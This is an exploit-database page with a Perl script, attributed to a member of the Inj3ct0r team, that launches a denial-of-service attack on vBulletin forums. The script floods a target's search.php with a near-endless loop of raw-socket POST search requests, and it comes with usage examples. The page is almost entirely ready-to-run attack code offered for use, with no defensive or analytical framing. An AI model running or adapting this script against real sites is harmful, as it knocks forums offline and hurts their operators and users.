vBulletin 4.0.0 Beta 5 Remote Denial of Service



EKU-ID: 2386 CVE: OSVDB-ID:
Author: Angel Injection Published: 2012-07-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/perl
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] vBulletin 4.0.0 Beta 5 Remote Denial of Service
[-] Found by Angel Injection
[-] Version: 4.0.4
[-] Security -::RISK: High
[-] platforms: php
[-] http://1337day.com http://r00tw0rm.com http://i313.cc
use Socket;

if (@ARGV < 2) { &usage; }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)

{

$user="h4x0r".$rand.$i;

$data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";

$len = length $data;

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

               "Accept: */*\r\n".

               "Accept-Language: en-gb\r\n".

               "Content-Type: application/x-www-form-urlencoded\r\n".

               "Accept-Encoding: gzip, deflate\r\n".

               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

               "Host: $host\r\n".

               "Content-Length: $len\r\n".

               "Connection: Keep-Alive\r\n".

               "Cache-Control: no-cache\r\n\r\n".

"$data";

     my $port = "80";

     my $proto = getprotobyname('tcp');





     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

     send(SOCKET,"$foo", 0);

     syswrite STDOUT, "|";

}

print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0  \n";

print "\tex: $0 127.0.0.1 /forum/\n";

print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";

exit();

};